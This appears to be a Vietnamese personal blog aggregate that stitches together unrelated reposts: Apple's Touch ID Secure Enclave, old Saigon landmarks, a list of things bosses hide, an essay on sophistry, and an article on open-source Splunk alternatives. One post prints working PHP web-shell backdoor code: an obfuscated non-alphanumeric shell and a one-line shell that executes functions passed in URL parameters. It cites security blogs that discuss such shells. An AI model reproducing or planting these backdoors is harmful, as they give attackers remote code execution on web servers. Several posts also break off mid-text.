Tản mạn về cách Apple bảo mật tính năng Finger Print trên iPhone 5s

Apple giải thích khá kỹ về cách mà họ bảo vệ các dữ liệu dấu vân tay khỏi NSA 

"Khu vực an toàn nội bộ ( Secure Enclave )
Touch ID không lưu trữ bất kỳ hình ảnh nào về dấu vân tay của bạn. Nó chỉ lưu duy mất các mẫu phân tích toán học về dấn vân tay của bạn. Và hoàn toàn bất khả thi trong việc từ các dữ liệu toán học này khôi phục lại thành hình ảnh dấu vân tay của bạn. iPhone 5s cũng kèm thêm trong nó một số công nghệ bảo mật đặc biệt được gọi là “Khu vực an toàn nội bộ” nằm ngay bên trong chip A7, công nghệ này được phát triển nhằm bảo vệ mã pin đăng nhập iPhone và dữ liệu vân tay. Dữ liệu về dấu vân tay sẽ được mã hoá và bảo vệ với một khoá mã hoá chỉ có trong “Khu vực an toàn nội bộ”. Dữ liệu dấu vân tay sẽ chỉ được dùng bởi “Khu vực an toàn nội bộ” để xác thực dấu vân tay của bạn là hợp lệ. “Khu vực an toàn nội bộ” được cách ly hoàn toàn khỏi các phần còn lại của chip A7 cũng như toàn bộ các phần còn lại của HDH iOS. Do đó, dữ liệu dấu vân tay của bạn sẽ không bao giờ có thể được truy cập bởi iOS hoặc bất kỳ ứng dụng nào khác, không bao giờ được lưu trên các máy chủ của Apple và không bao giờ được sao lưu trên iCloud hoặc bất kỳ nơi nào khác. Chỉ tính năng Touch ID có thể dùng các dữ liệu này và nó không thể được dùng để so khớp với các cơ sở dữ liệu dấu vân ta nào khác ( ví dụ như của NSA chẳng hạn )"

He he sắp thời gian du khảo SG hết những chỗ này :)

Bài copy từ
http://kimdunghn.wordpress.com/2013/11/03/nhung-cai-nhat-cua-sai-gon-xua/

Những cái nhất của Sài Gòn xưa

Tác giả:

KD: Mình được bạn bè gửi cho những hình ảnh này về Sài Gòn xưa. Cảm ơn bạn bè yêu quý luôn chia sẻ.

NGÔI TRƯỜNG CỔ NHẤT 

Trường Lê Quý Đôn được xây dựng vào năm 1874, hoàn tất năm 1877 do người Pháp quản lý. Lúc đầu trường có tên Collège Indigène (Trung học bản xứ), rồi đổi thành Collège Chasseluop Laubat. Năm 1954, trường mang tên Jean Jacques Rousseau. Năm 1967, trường được trả cho người Việt quản lý mang tên Trung tâm giáo dục Lê Quý Đôn. Từ năm 1975 đến nay đổi tên là trường Trung học phổ thông Lê Quý Đôn. Hơn một thế kỷ qua trường vẫn giữ được kiến trúc ban đầu. 

Nhà máy điện xưa nhất (góc đại lộ Đông Tây và đường Nguyễn Văn Cừ)

Nhà máy điện Chợ Quán xây dựng năm 1896, máy phát điện chạy bằng hơi nước có 5 lò hơi với 150m2, cung cấp dòng điện 3 pha, công suất chưa tới 120MW. Máy phát điện chính công suất 1000A/h. Hiện nay, nhà máy đã được trang bị hiện đại với 7 máy phát điện, hòa với lưới điện quốc gia cung ứng phần quan trọng cho lưới điện thành phố. Nhà máy toạ lạc tại số 8 Bến Hàm Tử, quận 5.Bây giờ

Đáp án Digital Analytics Fundamentals - Final assessment - Results 100% Score

100% Score :))

Digital Analytics Fundamentals - Final assessment

9 nỗi niềm riêng của các Sếp (cầu cho lính tôi đọc được)

9 nỗi niềm riêng của các Sếp

1. “Tôi đuối vì cứ phải giải quyết rắc rối của bạn”

Phần lớn công việc của các Sếp là lắng nghe vấn đề, rắc rối của nhân viên và giúp họ tìm cách giải quyết. Tuy nhiên, trong một số trường hợp, các Sếp thực sự rất mong nhân viên có thể đề xuất và có giải pháp cho riêng mình, thay vì phải nhờ cậy phiền hà đến cấp trên.

2. “Tôi không kiếm tiền nhiều như bạn nghĩ đâu”
Hầu hết nhân viên đều nghĩ, làm Sếp thì ăn ngủ trên cả đống tiền. Đúng là vẫn có rất nhiều CEOs nổi tiếng và giỏi giang cự phách, kiếm được rất nhiều tiền, nhưng tiếc là không phải Sếp nào cũng thế. Sếp có thể cũng như bạn thôi, đang phải chật vật xoay xở với các hóa đơn và chi phí hàng tháng.

3. “Đôi khi tôi chẳng muốn làm Sếp gì cả”
Đừng nghĩ làm Sếp là được sướng, được lười khỏi làm gì cả nhé! Ngược lại, các Sếp luôn phải làm việc chăm chỉ và chịu hi sinh nhiều thứ để có thể đạt được như ngày hôm nay. (Và một số Sếp cũng rất ghét khi phải giao việc cho bạn, hay nhờ vả ai đó để làm những việc mà chính họ có thể tự hoàn thành được.)

4. “Không phải chuyện nào tôi cũng được thẳng thắn với nhân viên”
Thẳng thắn với nhân viên sẽ giúp mối quan hệ giữa Sếp và nhân viên tốt hơn. Các Sếp sẽ không muốn giữa Sếp với nhân viên có bí mật gì. Nhưng về thực tiễn pháp lý và các quy định chung của tổ chức, công ty, Sếp buộc lòng phải “thôi ta giấu cho riêng ta biết”.

5. “Tôi sẽ biết khi bạn ném đá tôi”
Những lời nói xấu sẽ không lọt đến tai Sếp theo nhiều cách mà nhân viên không biết trước được. Có thể “người bạn” mà bạn hay chia sẻ các lời phàn nàn đã không giữ bí mật cho riêng mình.

6. “Tôi thích cân nhắc những lời khuyên từ bên thứ 3 hơn”
Có 1 điều chắc chắn rằng, nhân viên nào cũng mong muốn mình là người được Sếp tham vấn ý kiến. Tuy nhiên, các tư vấn viên hoặc nhân viên bán hàng sẽ là người có quan điểm, góc nhìn tốt hơn và nhất là, họ sẽ chấp nhận lời từ chối và kiềm chế cảm xúc tốt hơn khi Sếp “vùi dập” ý kiến của họ.

7. “Có lúc tôi chẳng biết phải làm thế nào”
Làm Sếp đòi hỏi phải nhìn xa trông rộng, nhưng không phải lúc nào họ cũng đúng đắn. Quản lý công việc và tài nguyên đã khó, nhưng quản lý con người càng khó hơn gấp bội. Do đó, không phải lúc nào các Sếp cũng có thể đưa ra quyết định đúng hay cư xử một cách hoàn hảo.

8. “Tôi muốn bạn cứ làm đúng như tôi giao”
Muốn làm việc hiệu quả và đạt được kết quả thì giữa Sếp và nhân viên cần có sự trao đổi, thảo luận thường xuyên đạt được sự đồng thuận. Tuy vậy, có những thời điểm đòi hỏi nhân viên phải nhạy cảm để nắm được ý Sếp và cứ làm theo đúng như yêu cầu. Ý kiến gì thì cứ việc lên phường!

9. “Tôi thật lòng mong bạn thành công *mắt chớp chớp*”
Sếp đã chọn bạn, nghĩa là Sếp tin tưởng vào bạn và quyết định đầu tư thời gian, công sức, và tiền bạc vào bạn, với mong mỏi bạn sẽ luôn vui vẻ, trẻ khỏe. Lợi nhuận từ sự đầu tư này trước hết là hiệu suất công việc, lòng trung thành, và xa hơn nữa là các thành quả cá nhân mà chính bạn gặt hái được.

~
Dịch: Karmi Phúc
Nguồn: http://www.inc.com/geoffrey-james/9-truths-bosses-hide-from-employees.html

Thói ngụy biện ở người Việt

Bài này tôi copy từ đây về đặng để tham khảo về sau
http://tuanvannguyen.blogspot.com/2010/05/thoi-nguy-bien-o-nguoi-viet.html

-----------------------

 Thói ngụy biện ở người Việt

Tranh luận trên các diễn đàn công cộng là một hình thức trao đổi ý kiến không thể thiếu được trong một xã hội văn minh. Ở nhiều nước, lưu lượng của những tranh luận cởi mở và nghiêm túc được xem là một dấu hiệu của một xã hội lành mạnh. Ở các nước phương Tây, hầu như ngày nào báo chí cũng có những bài của những cây bỉnh bút tranh luận về một vấn đề nóng nào đó. Trên tivi cũng có những cuộc tranh luận trực tiếp giữa hai hay nhiều người về những chủ đề từ “đại sự” đến những vấn đề tưởng như nhỏ nhất. Trong các hội nghị khoa học, trước một vấn đề còn trong vòng nghi vấn, người ta cũng có những chuyên gia tranh luận dưới dạng những bài giảng khoa học.

Nhưng thế nào là tranh luận nghiêm túc? Nói một cách ngắn gọn, cũng như trong một cuộc đấu võ, một tranh luận nghiêm túc là một cuộc tranh luận có qui tắc, mà trong đó người tham gia không được, hay cần phải tránh, phạm luật chơi. Những qui tắc chung và căn bản là người tham gia chỉ phát biểu bằng cách vận dụng những lí lẽ logic, với thái độ thành thật và cởi mở, chứ không phát biểu theo cảm tính, lười biếng, hay biểu hiện một sự thiển cận, đầu óc hẹp hòi.

PHP Shell backdoor không có kí tự chữ và số

<?php

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

?>

Tham khảo thêm tại
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
Bắt nguồn từ đây:
http://blog.omfgitsasalmon.com/

Con shell này là biến dị khởi nguồn từ con Shell được gọi là The most tiny php shell
Được tác giả của nó đăng lên twitter tại https://twitter.com/dragosr/status/116759108526415872 vào năm 2011

<?=($_=@$_GET[2]).@$_($_GET[1])?>

Build Your Own Splunk-Like Central Log Management Tool With Open Source Software

Matt Weinberger  inSha2

In the age of big data, log management is becoming an absolute necessity, as developers, operations, and, yes, DevOps have to deal with and process huge amounts of machine-generated data. Many organizations have turned to Splunk, a pioneer in the space, to help manage the rising tide of log data – but Splunk can get really, really expensive.

There’s still not a single general-purpose alternative to Splunk. But over the weekend,  Booking.com SysAdmin Brad Lhotsky documented his quest to build his own central log management system using only open source software.

Of course, his blog entry contains much deeper technical insight, but at the high level, he broke his solution down into three components: Log centralization (rsyslog), log management (logstash/Kibana) and log visualization (Graphite).

Rsyslog was tapped for log centralization over similarly popular alternative syslog-ng because the former offers guaranteed delivery and encrypted transfer in the open source edition – two features that Lhotsky says are becoming of increased importance to regulatory compliance auditors. With rsyslog, Lhotsky was able to build a reliable way to transport event logs from Unix hosts to a central repository.

This is where Lhotsky starts entering Splunk’s territory, calling the company “the 1,000 lb Gorilla in the room.” But in lieu of Splunk, Lhotsky writes that he took the MongoDB-powered Graylog2 for a test drive before settling on logstash. Graylog2 is great, he says, but suggests that its ElasticSearch indexing scheme is “broken,” and if you have to keep a large amount of logs around for compliance reasons, you’re going to take a performance hit. Lhotsky goes so far as to speculate that it’s because Graylog2 only implemented ElasticSearch for, well, search fairly late in the game.

On the other side of the coin, logstash also uses ElasticSearch, but with far more of a focus on scalability, inputs, filter and outputs. The cost, Lhotsky writes, is a polished front-end. Enter Kibana, a PHP front-end for logstash that takes the ElasticSearch indexes and adds a front-end for search and analysis, making the whole platform a lot more usable.

“Kibana fills the gap with the Logstash interface so perfectly. It doesn’t give me everything I’d get with Splunk, but I’ve just touched the functionality I can extract with Logstash,” as Lhotsky puts it.

Finally, he suggests the popular Graphite for data visualization and graphing all the log data you’ve now collected.

As Lhotsky says, this just how he tried to match Splunk-like functionality with open source tools, and it’s still a work in progress. He’s on Twitter if you want to talk to him about this implementation directly, or else leave a comment below.

Regardless, there’s a definite and growing need for log management tools, and I’m wondering why Splunk is still relatively unchallenged in the space.

source: http://devopsangle.com/2012/06/18/build-your-own-splunk-like-central-log-management-tool-with-open-source-software/

Lời bàn:

Tôi biết đến Splunk lần đầu tiên trong bài của anh Thái ( Thaidn ) về sử dụng Splunk trong pre-analysis access.log trong việc chống DDoS thụ động. Sau khi thử nghiệm Splunk xong thì đúng là đây là công cụ quản trị, phân tích, tổng hợp, trình diễn log và big data ( structured ) tốt nhất tôi từng thấy. Đó là cái lý do chính mà Splunk được bán với giá 5000$ ( mức cơ bản ) cho bản Enterprise

Do cái giá đắt đỏ của nó mà tôi luôn tìm kiếm giải pháp thay thế, thật không may Splunk đắt là vì nó tốt và hiện là duy nhất :D

Bài viết trên đây là một trong số những cách phối hợp các công cụ opensource để đạt được một số  main features mà Splunk cung cấp